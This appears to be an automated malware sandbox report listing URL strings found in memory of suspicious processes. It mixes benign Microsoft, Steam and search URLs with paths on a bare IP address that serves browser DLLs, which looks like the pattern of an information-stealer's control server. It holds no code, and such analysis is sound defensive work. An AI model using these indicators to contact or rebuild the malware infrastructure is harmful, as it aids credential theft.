Source: kat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/kX
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dll
Source: kat796E.tmp, 00000009.00000003.2569509990.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sB
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dllt
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000052E000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000899000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sqls.dll
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sx
Source: kat796E.tmp, 00000009.00000003.2561043471.0000000000932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/t
Source: kat796E.tmp, 00000009.00000003.2569509990.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2561219190.00000000008A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/v
Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll/
Source: kat796E.tmp, 00000009.00000003.2549323476.0000000000932000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/x
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59BGCB
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59CAKE
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59FBKJ
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1697094973.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692031971.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.clo
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: HCFIII.9.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
